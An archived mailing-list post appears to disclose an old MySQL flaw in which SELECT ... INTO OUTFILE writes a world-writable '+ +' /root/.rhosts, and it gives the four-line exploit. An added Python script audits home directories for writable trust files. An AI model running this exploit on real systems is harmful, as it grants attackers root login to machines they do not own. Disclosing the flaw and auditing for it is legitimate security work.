When you use a certain mysql configuration it is possible to create files on the system as root with rw-rw-rw. Many MySQL users have included user root from localhost without password in their config. So, if on such a system you issue:

    mysql -u root test

you not only will have access to the database but you'll be able to create a file on the system with root ownership and rw-rw-rw using the SELECT .. INTO OUTFILE statement. The file you wish to create must NOT EXIST. Otherwise mysql will give you a "file already exists" error. To be more precise: MySQL will create the file specified as OUTFILE with rw-rw-rw and with the current user as owner.

The exploit is as follows:

    mysql -u root test
    CREATE TABLE aa ( a CHAR(10) );
    INSERT INTO aa (a) VALUES ("+ +");
    SELECT * FROM aa INTO OUTFILE "/root/.rhosts";

The above exploit works for sites with rexec, rsh enabled (ssh is too smart and won't let you in if you have .rhosts 666, the same for authorized_keys).

Well, I've tried to be tricky by setting umask to 077 in the hope that I can trick MySQL into making the file 600. Childish try, I know, but... who knows? If someone could fool MySQL into making the file 600 then this is quite a serious threat..

All my best,
Sandu Mihai

p.s. The above works for Mysql Ver 6.5 Distrib 3.20.29 as reported by mysql -V

Have phun.. :)
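The artifact this technique leaves behind is a trust file (.rhosts, or an authorized_keys) that is group- or world-writable, which is exactly what sshd refuses and what rsh/rexec happily honour. The following audit script is an added example, not part of the original post and not MySQL's own code: it walks a tree of home directories and reports every .rhosts, .shosts or .ssh/authorized_keys with the group or other write bit set. The home-directory layout and the file contents it builds under a temporary directory are constructed for the demonstration.

```python
"""Audit trusted-host files for unsafe permissions (added example)."""
import os
import stat
import tempfile

# Files that grant login trust and must never be writable by others.
TRUST_FILES = (".rhosts", ".shosts", os.path.join(".ssh", "authorized_keys"))
# Group-write or other-write: the bits a 0666 OUTFILE would carry.
UNSAFE_BITS = stat.S_IWGRP | stat.S_IWOTH


def unsafe_trust_files(home_root):
    """Return a sorted list of (path, octal mode) for every trust file under
    home_root/<user>/ that is group- or world-writable."""
    findings = []
    for entry in os.scandir(home_root):
        if not entry.is_dir(follow_symlinks=False):
            continue
        for rel in TRUST_FILES:
            path = os.path.join(entry.path, rel)
            try:
                st = os.lstat(path)  # do not follow symlinks
            except FileNotFoundError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & UNSAFE_BITS:
                findings.append((path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)


def demo():
    """Build a constructed home tree: one .rhosts at 0600 (safe) and one at
    0666 (as a SELECT ... INTO OUTFILE would leave it), then audit it.
    Returns the findings with paths relative to the constructed root."""
    root = tempfile.mkdtemp(prefix="homes-")
    for user, mode in (("alice", 0o600), ("bob", 0o666)):
        user_dir = os.path.join(root, user)
        os.makedirs(user_dir)
        rhosts = os.path.join(user_dir, ".rhosts")
        with open(rhosts, "w") as fh:
            fh.write("constructed sample content\n")
        os.chmod(rhosts, mode)  # explicit chmod so the umask does not matter
    return [(os.path.relpath(p, root), m) for p, m in unsafe_trust_files(root)]


if __name__ == "__main__":
    for path, mode in demo():
        print(f"UNSAFE {mode} {path}")
```

Run it against a real `/home` by calling `unsafe_trust_files("/home")`; the check uses `lstat` so a symlink planted in place of the file is not silently followed. The same bit test applies to any other file a database account with FILE privilege could drop, so the `TRUST_FILES` tuple is the place to extend it.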
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:47:21 PDT